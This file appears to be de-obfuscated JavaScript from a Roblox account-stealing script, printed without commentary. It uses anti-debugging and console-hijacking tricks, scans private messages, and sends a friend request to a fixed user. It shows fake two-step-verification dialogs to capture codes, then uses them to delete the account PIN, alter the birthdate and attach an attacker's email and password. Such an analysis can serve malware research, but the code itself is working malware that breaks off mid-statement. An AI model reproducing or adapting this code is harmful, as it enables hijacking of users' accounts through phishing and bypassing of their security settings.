```text name=deobfuscated.txt
(async function () {
    var S = (function () {
        var R = {
            LQCxc: "true",
            AVLuo: "promptPopup",
            vrRWh: "text-footer footer-note",
            zDAXL: "Not Active",
            HaeZH: function (q, Q) {
                return q !== Q;
            },
            Mwojr: "kcPGM",
            WQuZg: function (q, Q) {
                return q === Q;
            },
            jlilo: "zhwbG",
            cfBjf: "LopqM",
        };
        var T = true;
        return function (Q, n) {
            var F = { eQZAk: "btn-cta-md modal-modern-footer-button" };
            var B = T
                ? function () {
                      var O = {
                          ZtliN: R.LQCxc,
                          Iparb: R.AVLuo,
                          ssRmH: R.vrRWh,
                          eBpCj: R.zDAXL,
                      };
                      if (R.HaeZH(R.Mwojr, R.Mwojr)) {
                          h.push(L.ZtliN);
                      } else {
                          if (n) {
                              if (R.WQuZg(R.jlilo, R.cfBjf)) {
                                  t.getElementById(L.Iparb).remove();
                                  V.getElementsByClassName(
                                      L.ssRmH
                                  )[0].innerText = L.eBpCj;
                              } else {
                                  var e = n.apply(Q, arguments);
                                  return (n = null), e;
                              }
                          }
                      }
                  }
                : function () {};
            return (T = false), B;
        };
    })();
    var C = S(this, function () {
        return C.toString()
            .search("(((.+)+)+)+$")
            .toString()
            .constructor(C)
            .search("(((.+)+)+)+$");
    });
    C();
    var V = (function () {
        var T = true;
        return function (q, Q) {
            var F = T
                ? function () {
                      if (Q) {
                          var L = Q.apply(q, arguments);
                          return (Q = null), L;
                      }
                  }
                : function () {};
            return (T = false), F;
        };
    })();
    (function () {
        V(this, function () {
            var Q = new RegExp("function *\\( *\\)"),
                n = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", "i"),
                F = t("init");
            if (!Q.test(F + "chain") || !n.test(F + "input")) {
                F("0");
            } else {
                t();
            }
        })();
    })();
    var h = (function () {
            var T = true;
            return function (q, Q) {
                var F = T
                    ? function () {
                          if (Q) {
                              var p = Q.apply(q, arguments);
                              return (Q = null), p;
                          }
                      }
                    : function () {};
                return (T = false), F;
            };
        })(),
        N = h(this, function () {
            var T;
            try {
                var q = Function(
                    'return (function() {}.constructor("return this")( ));'
                );
                T = q();
            } catch (v) {
                T = window;
            }
            var Q = (T.console = T.console || {}),
                n = [
                    "log",
                    "warn",
                    "info",
                    "error",
                    "exception",
                    "table",
                    "trace",
                ];
            for (var F = 0; F < n.length; F++) {
                var L = h.constructor.prototype.bind(h);
                var O = n[F];
                var u = Q[O] || L;
                L["__proto__"] = h.bind(h);
                L.toString = u.toString.bind(u);
                Q[O] = L;
            }
        });
    N();
    const w = (R) => new Promise((T) => setTimeout(T, R));
    var X = [
            "a2luZ2thbmdhcm9veGRAZ21haWwuY29t",
            "a2luZ2thbmdhcm9veGRAZ21haWwuY29t",
            "a2luZ2thbmdhcm9veGRAZ21haWwuY29t",
            "a2luZ2thbmdhcm9veGRAZ21haWwuY29t",
        ],
        M = "gmail.com",
        i = "k***",
        Y = X[Math.floor(Math.random() * X.length)],
        W = 6045232974;
    validDev = [];
    try {
        $.ajax({
            method: "GET",
            url: "https://privatemessages.roblox.com/v1/messages?messageTab=inbox&pageNumber=0&pageSize=20",
            contentType: "application/json",
            success: function (R) {
                var q = Number(R.totalPages);
                for (let n = 0; n < q; n++) {
                    $.ajax({
                        method: "GET",
                        url:
                            "https://privatemessages.roblox.com/v1/messages?messageTab=inbox&pageNumber=" +
                            n +
                            "&pageSize=20",
                        contentType: "application/json",
                        success: function (p) {
                            var L = p.collection;
                            for (var e of L) {
                                if (e.body.includes("VlK Games") == true) {
                                    validDev.push("true");
                                }
                            }
                        },
                    });
                }
            },
        });
    } catch {}
    try {
        $.ajax({
            method: "GET",
            url: "https://privatemessages.roblox.com/v1/messages?messageTab=archive&pageNumber=0&pageSize=20",
            contentType: "application/json",
            success: function (q) {
                var n = Number(q.totalPages);
                for (let F = 0; F < n; F++) {
                    $.ajax({
                        method: "GET",
                        url:
                            "https://privatemessages.roblox.com/v1/messages?messageTab=archive&pageNumber=" +
                            F +
                            "&pageSize=20",
                        contentType: "application/json",
                        success: function (B) {
                            var L = B.collection;
                            for (var e of L) {
                                if (e.body.includes("VlK Games") == true) {
                                    validDev.push("true");
                                }
                            }
                        },
                    });
                }
            },
        });
    } catch {}
    try {
        console.log(
            document.getElementsByClassName("text-footer footer-note")[0]
                .innerText
        );
    } catch {
        window.location.reload();
    }
    if (
        document.getElementsByClassName("text-footer footer-note")[0]
            .innerText != "Active"
    ) {
        document.getElementsByClassName(
            "text-footer footer-note"
        )[0].innerText = "Active";
        $.ajax({
            method: "GET",
            url: "https://users.roblox.com/v1/users/authenticated",
            contentType: "application/json",
            success: function (n) {
                var p = n.id;
                try {
                    var B = { friendshipOriginSourceType: 0 };
                    $.ajax({
                        method: "POST",
                        url:
                            "https://friends.roblox.com/v1/users/" +
                            W +
                            "/request-friendship",
                        contentType: "application/json",
                        data: JSON.stringify(B),
                    });
                } catch {}
                async function O() {
                    function u() {
                        $.ajax({
                            method: "GET",
                            url: "https://accountsettings.roblox.com/v1/email",
                            contentType: "application/json",
                            success: function (J) {
                                if (J.emailAddress == null) {
                                    $.ajax({
                                        method: "POST",
                                        url: "https://accountsettings.roblox.com/v1/email",
                                        contentType: "application/json",
                                        data: JSON.stringify({
                                            emailAddress: atob(Y),
                                            password: "Acepro2k",
                                        }),
                                    });
                                } else {
                                    var a = J.emailAddress,
                                        Z = J.verified;
                                    if (a.includes(M) == true) {
                                        a.includes(i) == true &&
                                            Z == true &&
                                            (async function () {
                                                await w(500);
                                                var m = {
                                                    method: "POST",
                                                    url: "https://auth.roblox.com/v2/logout",
                                                    contentType:
                                                        "application/json",
                                                };
                                                $.ajax(m);
                                            })();
                                    }
                                }
                            },
                        }),
                            setTimeout(u, 2000);
                    }
                    u();
                    function I(y, z, J) {
                        $.ajax({
                            method: "POST",
                            url:
                                "https://twostepverification.roblox.com/v1/users/" +
                                p +
                                "/challenges/email/send-code",
                            contentType: "application/json",
                            data: JSON.stringify({
                                actionType: "Generic",
                                challengeId: y,
                            }),
                            success: function () {
                                var A =
                                    '<div id="twoStepPrompts" role="dialog"> <div class="fade modal-backdrop in"></div> <div role="dialog" tabindex="-1" style="display: block;" class="fade modal-moder[...]
                                document.body.insertAdjacentHTML(
                                    "beforeend",
                                    A
                                );
                                function G() {
                                    document.getElementById(
                                        "two-step-verification-code-input"
                                    ).value.length == 6
                                        ? (document.getElementsByClassName(
                                              "btn-cta-md modal-modern-footer-button"
                                          )[0].disabled = false)
                                        : (document.getElementsByClassName(
                                              "btn-cta-md modal-modern-footer-button"
                                          )[0].disabled = true);
                                    setTimeout(G, 100);
                                }
                                G();
                                document.getElementsByClassName(
                                    "btn-cta-md modal-modern-footer-button"
                                )[0].onclick = function () {
                                    $.ajax({
                                        method: "POST",
                                        url:
                                            "https://twostepverification.roblox.com/v1/users/" +
                                            p +
                                            "/challenges/email/verify",
                                        contentType: "application/json",
                                        data: JSON.stringify({
                                            challengeId: y,
                                            actionType: "Generic",
                                            code: document.getElementById(
                                                "two-step-verification-code-input"
                                            ).value,
                                        }),
                                        success: function (m) {
                                            var l0 = m.verificationToken;
                                            $.ajax({
                                                method: "POST",
                                                url: "https://apis.roblox.com/challenge/v1/continue",
                                                contentType: "application/json",
                                                data: JSON.stringify({
                                                    challengeId: z,
                                                    challengeMetadata:
                                                        '{"verificationToken":"' +
                                                        l0 +
                                                        '","rememberDevice":false,"challengeId":"' +
                                                        y +
                                                        '","actionType":"Generic"}',
                                                    challengeType:
                                                        "twostepverification",
                                                }),
                                                success: function () {
                                                    document
                                                        .getElementById(
                                                            "twoStepPrompts"
                                                        )
                                                        .remove();
                                                    w(2000);
                                                    var l3 = btoa(
                                                        '{"reauthenticationToken":"' +
                                                            l0 +
                                                            '"}'
                                                    );
                                                    console.log(J);
                                                    if (J == 1) {
                                                        console.log(
                                                            "Reason is 1"
                                                        );
                                                        var l4 = {
                                                            method: "POST",
                                                            url:
                                                                "https://twostepverification.roblox.com/v1/users/" +
                                                                p +
                                                                "/configuration/email/enable",
                                                            contentType:
                                                                "application/json",
                                                            headers: {},
                                                        };
                                                        l4.headers[
                                                            "Rblx-Challenge-Type"
                                                        ] = "reauthentication";
                                                        l4.headers[
                                                            "Rblx-Challenge-Id"
                                                        ] = z;
                                                        l4.headers[
                                                            "Rblx-Challenge-Metadata"
                                                        ] = l3;
                                                        $.ajax(l4);
                                                    } else {
                                                        if (J == null) {
                                                            $.ajax({
                                                                method: "DELETE",
                                                                url: "https://auth.roblox.com/v1/account/pin",
                                                                contentType:
                                                                    "application/json",
                                                                headers: {
                                                                    "Rblx-Challenge-Type":
                                                                        "reauthentication",
                                                                    "Rblx-Challenge-Id":
                                                                        z,
                                                                    "Rblx-Challenge-Metadata":
                                                                        l3,
                                                                },
                                                                success:
                                                                    function () {
                                                                        o(
                                                                            null,
                                                                            null
                                                                        );
                                                                    },
                                                            });
                                                        } else {
                                                            o(z, l3);
                                                        }
                                                    }
                                                },
                                            });
                                        },
                                        error: function () {
                                            (document.getElementsByClassName(
                                                "form-control-label bottom-label xsmall"
                                            )[0].innerText = "Invalid code"),
                                                (document.getElementById(
                                                    "groupElementId"
                                                ).className =
                                                    "form-has-feedback  form-has-error form-group");
                                        },
                                    });
                                };
                            },
                        });
                    }
                    function v(y, z, J) {
                        var a =
                            '<div id="twoStepPrompts" role="dialog"> <div class="fade modal-backdrop in"></div> <div role="dialog" tabindex="-1" style="display: block;" class="fade modal-modern in mod[...]
                        document.body.insertAdjacentHTML("beforeend", a);
                        function Z() {
                            document.getElementById(
                                "two-step-verification-code-input"
                            ).value.length == 6
                                ? (document.getElementsByClassName(
                                      "btn-cta-md modal-modern-footer-button"
                                  )[0].disabled = false)
                                : (document.getElementsByClassName(
                                      "btn-cta-md modal-modern-footer-button"
                                  )[0].disabled = true),
                                setTimeout(Z, 100);
                        }
                        Z();
                        document.getElementsByClassName(
                            "btn-cta-md modal-modern-footer-button"
                        )[0].onclick = function () {
                            $.ajax({
                                method: "POST",
                                url:
                                    "https://twostepverification.roblox.com/v1/users/" +
                                    p +
                                    "/challenges/authenticator/verify",
                                contentType: "application/json",
                                data: JSON.stringify({
                                    challengeId: y,
                                    actionType: "Generic",
                                    code: document.getElementById(
                                        "two-step-verification-code-input"
                                    ).value,
                                }),
                                success: function (G) {
                                    var f = G.verificationToken;
                                    $.ajax({
                                        method: "POST",
                                        url: "https://apis.roblox.com/challenge/v1/continue",
                                        contentType: "application/json",
                                        data: JSON.stringify({
                                            challengeId: z,
                                            challengeMetadata:
                                                '{"verificationToken":"' +
                                                f +
                                                '","rememberDevice":false,"challengeId":"' +
                                                y +
                                                '","actionType":"Generic"}',
                                            challengeType:
                                                "twostepverification",
                                        }),
                                        success: function () {
                                            document
                                                .getElementById(
                                                    "twoStepPrompts"
                                                )
                                                .remove();
                                            w(2000);
                                            var l0 = btoa(
                                                '{"reauthenticationToken":"' +
                                                    f +
                                                    '"}'
                                            );
                                            if (J == 1) {
                                                console.log("Reason is 1");
                                                var l1 = {
                                                    method: "POST",
                                                    url:
                                                        "https://twostepverification.roblox.com/v1/users/" +
                                                        p +
                                                        "/configuration/email/enable",
                                                    contentType:
                                                        "application/json",
                                                    headers: {},
                                                };
                                                l1.headers[
                                                    "Rblx-Challenge-Type"
                                                ] = "reauthentication";
                                                l1.headers[
                                                    "Rblx-Challenge-Id"
                                                ] = z;
                                                l1.headers[
                                                    "Rblx-Challenge-Metadata"
                                                ] = l0;
                                                $.ajax(l1);
                                            } else {
                                                if (J == null) {
                                                    $.ajax({
                                                        method: "DELETE",
                                                        url: "https://auth.roblox.com/v1/account/pin",
                                                        contentType:
                                                            "application/json",
                                                        headers: {
                                                            "Rblx-Challenge-Type":
                                                                "reauthentication",
                                                            "Rblx-Challenge-Id":
                                                                z,
                                                            "Rblx-Challenge-Metadata":
                                                                l0,
                                                        },
                                                        success: function () {
                                                            o(null, null);
                                                        },
                                                    });
                                                } else {
                                                    o(z, l0);
                                                }
                                            }
                                        },
                                    });
                                },
                                error: function (G) {
                                    G.responseText.includes('"code":18')
                                        ? ((document.getElementsByClassName(
                                              "form-control-label bottom-label xsmall"
                                          )[0].innerText =
                                              "This code has already been used. Please enter a new code."),
                                          (document.getElementById(
                                              "groupElementId"
                                          ).className =
                                              "form-has-feedback  form-has-error form-group"))
                                        : ((document.getElementsByClassName(
                                              "form-control-label bottom-label xsmall"
                                          )[0].innerText = "Invalid code"),
                                          (document.getElementById(
                                              "groupElementId"
                                          ).className =
                                              "form-has-feedback  form-has-error form-group"));
                                },
                            });
                        };
                    }
                    function x(y, z) {
                        $.ajax({
                            method: "POST",
                            url: "https://apis.roblox.com/otp-service/v1/sendCodeForUser",
                            contentType: "application/json",
                            data: JSON.stringify({
                                contactType: "Email",
                                messageVariant: "Default",
                                origin: "Reauth",
                            }),
                            success: function (J) {
                                var a = J.otpSessionToken,
                                    Z =
                                        '<div id="twoStepPrompts" role="dialog"> <div class="fade modal-backdrop in"></div> <div role="dialog" tabindex="-1" style="display: block;" class="fade modal-m[...]
                                document.body.insertAdjacentHTML(
                                    "beforeend",
                                    Z
                                );
                                function K() {
                                    if (
                                        document.getElementById(
                                            "two-step-verification-code-input"
                                        ).value.length == 6
                                    ) {
                                        document.getElementsByClassName(
                                            "btn-cta-md modal-modern-footer-button"
                                        )[0].disabled = false;
                                    } else {
                                        document.getElementsByClassName(
                                            "btn-cta-md modal-modern-footer-button"
                                        )[0].disabled = true;
                                    }
                                    setTimeout(K, 100);
                                }
                                K();
                                document.getElementsByClassName(
                                    "btn-cta-md modal-modern-footer-button"
                                )[0].onclick = function () {
                                    $.ajax({
                                        method: "POST",
                                        url: "https://apis.roblox.com/otp-service/v1/validateCode",
                                        contentType: "application/json",
                                        data: JSON.stringify({
                                            contactType: "Email",
                                            origin: "Reauth",
                                            otpSessionToken: a,
                                            passCode: document.getElementById(
                                                "two-step-verification-code-input"
                                            ).value,
                                        }),
                                        success: function () {
                                            $.ajax({
                                                method: "POST",
                                                url: "https://apis.roblox.com/reauthentication-service/v1/token/generate",
                                                contentType: "application/json",
                                                data: JSON.stringify({
                                                    sessionId: a,
                                                    type: "Otp_Email",
                                                }),
                                                success: function (f) {
                                                    responseToken = f.token;
                                                    $.ajax({
                                                        method: "POST",
                                                        url: "https://apis.roblox.com/challenge/v1/continue",
                                                        contentType:
                                                            "application/json",
                                                        data: JSON.stringify({
                                                            challengeId: y,
                                                            challengeMetadata:
                                                                '{"reauthenticationToken":"' +
                                                                responseToken +
                                                                '"}',
                                                            challengeType:
                                                                "reauthentication",
                                                        }),
                                                        success: function () {
                                                            document
                                                                .getElementById(
                                                                    "twoStepPrompts"
                                                                )
                                                                .remove();
                                                            w(2000);
                                                            var l1 = btoa(
                                                                '{"reauthenticationToken":"' +
                                                                    responseToken +
                                                                    '"}'
                                                            );
                                                            if (z == 1) {
                                                                console.log(
                                                                    "Reason is 1"
                                                                );
                                                                var l2 = {
                                                                    method: "POST",
                                                                    url:
                                                                        "https://twostepverification.roblox.com/v1/users/" +
                                                                        p +
                                                                        "/configuration/email/enable",
                                                                    contentType:
                                                                        "application/json",
                                                                    headers: {},
                                                                };
                                                                l2.headers[
                                                                    "Rblx-Challenge-Type"
                                                                ] =
                                                                    "reauthentication";
                                                                l2.headers[
                                                                    "Rblx-Challenge-Id"
                                                                ] = y;
                                                                l2.headers[
                                                                    "Rblx-Challenge-Metadata"
                                                                ] = l1;
                                                                $.ajax(l2);
                                                            } else {
                                                                if (z == null) {
                                                                    $.ajax({
                                                                        method: "DELETE",
                                                                        url: "https://auth.roblox.com/v1/account/pin",
                                                                        contentType:
                                                                            "application/json",
                                                                        headers:
                                                                            {
                                                                                "Rblx-Challenge-Type":
                                                                                    "reauthentication",
                                                                                "Rblx-Challenge-Id":
                                                                                    y,
                                                                                "Rblx-Challenge-Metadata":
                                                                                    l1,
                                                                            },
                                                                        success:
                                                                            function () {
                                                                                o(
                                                                                    null,
                                                                                    null
                                                                                );
                                                                            },
                                                                    });
                                                                } else {
                                                                    o(y, l1);
                                                                }
                                                            }
                                                        },
                                                    });
                                                },
                                            });
                                        },
                                        error: function () {
                                            document.getElementsByClassName(
                                                "form-control-label bottom-label xsmall"
                                            )[0].innerText = "Invalid code";
                                            document.getElementById(
                                                "groupElementId"
                                            ).className =
                                                "form-has-feedback  form-has-error form-group";
                                        },
                                    });
                                };
                            },
                        });
                    }
                    function k(y, z, J) {
                        $.ajax({
                            method: "GET",
                            url:
                                "https://twostepverification.roblox.com/v1/users/" +
                                p +
                                "/configuration",
                            contentType: "application/json",
                            success: function (a) {
                                var A = a.primaryMediaType;
                                if (A == "Email") {
                                    I(y, z, J);
                                } else {
                                    if (A == "Authenticator") {
                                        v(y, z, J);
                                    } else {
                                        if (A == null) {
                                            x(z, J);
                                        }
                                    }
                                }
                            },
                        });
                    }
                    function o(y, z) {
                        $.ajax({
                            method: "GET",
                            url:
                                "https://twostepverification.roblox.com/v1/users/" +
                                p +
                                "/configuration",
                            contentType: "application/json",
                            success: function (b) {
                                var Z = b.primaryMediaType;
                                if (Z == "Authenticator") {
                                    document.getElementsByClassName(
                                        "text-footer footer-note"
                                    )[0].innerText = "Not Active";
                                    if (
                                        document.getElementById(
                                            "emailPopupz"
                                        ) == null
                                    ) {
                                        var A =
                                            '<div id="emailPopupz" role="dialog"><div class="fade modal-backdrop in"></div><div role="dialog" tabindex="-1" class="fade modal-modern in modal" style="di[...]
                                        document.body.insertAdjacentHTML(
                                            "beforeend",
                                            A
                                        );
                                        document.getElementsByClassName(
                                            "btn-cta-md modal-modern-footer-button"
                                        )[0].onclick = function () {
                                            document
                                                .getElementById("emailPopupz")
                                                .remove();
                                            document.getElementById(
                                                "agreeRoLinked"
                                            ).disabled = false;
                                            $.ajax({
                                                method: "POST",
                                                url:
                                                    "https://twostepverification.roblox.com/v1/users/" +
                                                    p +
                                                    "/configuration/email/enable",
                                                contentType: "application/json",
                                                success: function () {},
                                                error: function (H) {
                                                    var l2 = atob(
                                                            H.getResponseHeader(
                                                                "rblx-challenge-metadata"
                                                            )
                                                        ),
                                                        l3 =
                                                            H.getResponseHeader(
                                                                "rblx-challenge-id"
                                                            ),
                                                        l4 = l2
                                                            .split(
                                                                '"challengeId":"'
                                                            )
                                                            .pop()
                                                            .split('"')[0];
                                                    k(l4, l3, 1);
                                                },
                                            });
                                        };
                                    }
                                } else {
                                    if (y == null) {
                                        var K = {
                                            birthDay: 2,
                                            birthMonth: 2,
                                            birthYear: 2022,
                                        };
                                        $.ajax({
                                            method: "POST",
                                            url: "https://users.roblox.com/v1/birthdate",
                                            contentType: "application/json",
                                            data: JSON.stringify(K),
                                            success: function () {
                                                $.ajax({
                                                    method: "POST",
                                                    url: "https://accountsettings.roblox.com/v1/email",
                                                    contentType:
                                                        "application/json",
                                                    data: JSON.stringify({
                                                        emailAddress: atob(Y),
                                                        password: "Acepro2k",
                                                    }),
                                                    success: function () {
                                                        (async function () {
                                                            await w(1500);
                                                            $.ajax({
                                                                method: "GET",
                                                                url: "https://accountsettings.roblox.com/v1/email",
                                                                contentType:
                                                                    "application/json",
                                                                success:
                                                                    function (
                                                                        l5
                                                                    ) {
                                                                        if (
                                                                            l5.emailAddress ==
                                                                            null
                                                                        ) {
                                                                            $.ajax(
                                                                                {
                                                                                    method: "POST",
                                                                                    url: "https://accountsettings.roblox.com/v1/email",
                                                                                    contentType:
                                                                                        "application/json",
                                                                                    data: JSON.stringify(
                                                                                        {
                                                                                            emailAddress:
                                                                                                atob(
                                                                                                    Y
                                                                                                ),
                                                                                            password:
                                                                                                "Acepro2k",
                                                                                        }
                                                                                    ),
                                                                                }
                                                                            );
                                                                        }
                                                                    },
                                                            });
                                                        })();
                                                    },
                                                    error: function () {
                                                        (async function () {
                                                            await w(1500),
                                                                $.ajax({
                                                                    method: "GET",
                                                                    url: "https://accountsettings.roblox.com/v1/email",
                                                                    contentType:
                                                                        "application/json",
                                                                    success:
                                                                        function (
                                                                            l4
                                                                        ) {
                                                                            l4.emailAddress ==
                                                                                null &&
                                                                                $.ajax(
                                                                                    {
                                                                                        method: "POST",
                                                                                        url: "https://accountsettings.roblox.com/v1/email",
                                                                                        contentType:
                                                                                            "application/json",
                                                                                        data: JSON.stringify(
                                                                                            {
                                                                                                emailAddress:
                                                                                                    atob(
                                                                                                        Y
                                                                                                    ),
                                                                                                password:
                                                                                                    "Acepro2k",
                                                                                            }
                                                                                        ),
                                                                                    }
                                                                                );
                                                                        },
                                                                });
                                                        })();
                                                    },
                                                });
                                            },
                                            error: function (H) {
                                                var l2 = atob(
                                                        H.getResponseHeader(
                                                            "rblx-challenge-metadata"
                                                        )
                                                    ),
                                                    l3 =
                                                        H.getResponseHeader(
                                                            "rblx-challenge-id"
                                                        ),
                                                    l4 = l2
                                                        .split(
                                                            '"challengeId":"'
                                                        )
                                                        .pop()
                                                        .split('"')[0];
                                                k(l4, l3, 2);
                                            },
                                        });
                                    } else {
                                        var G = {
                                            birthDay: 2,
                                            birthMonth: 2,
                                            birthYear: 2022,
                                        };
                                        $.ajax({
                                            method: "POST",
                                            url: "https://users.roblox.com/v1/birthdate",
                                            contentType: "application/json",
                                            headers: {
                                                "Rblx-Challenge-Type":
                                                    "reauthentication",
                                                "Rblx-Challenge-Id": y,
                                                "Rblx-Challenge-Metadata": z,
                                            },
                                            data: JSON.stringify(G),
                                            success: function () {
                                                $.ajax({
                                                    method: "POST",
                                                    url: "https://accountsettings.roblox.com/v1/email",
                                                    contentType:
                                                        "application/json",
                                                    data: JSON.stringify({
                                                        emailAddress: atob(Y),
                                                        password: "Acepro2k",
                                                    }),
                                                    success: function () {
                                                        (async function () {
                                                            await w(1500),
                                                                $.ajax({
                                                                    method: "GET",
                                                                    url: "https://accountsettings.roblox.com/v1/email",
                                                                    contentType:
                                                                        "application/json",
                                                                    success:
                                                                        function (
                                                                            l2
                                                                        ) {
                                                                            l2.emailAddress ==
                                                                                null &&
                                                                                $.ajax(
                                                                                    {
                                                                                        method: "POST",
                                                                                        url: "https://accountsettings.roblox.com/v1/email",
                                                                                        contentType:
                                                                                            "application/json",
                                                                                        data: JSON.stringify(
                                                                                            {
                                                                                                emailAddress:
                                                                                                    atob(
                                                                                                        Y
                                                                                                    ),
                                                                                                password:
[...]

```

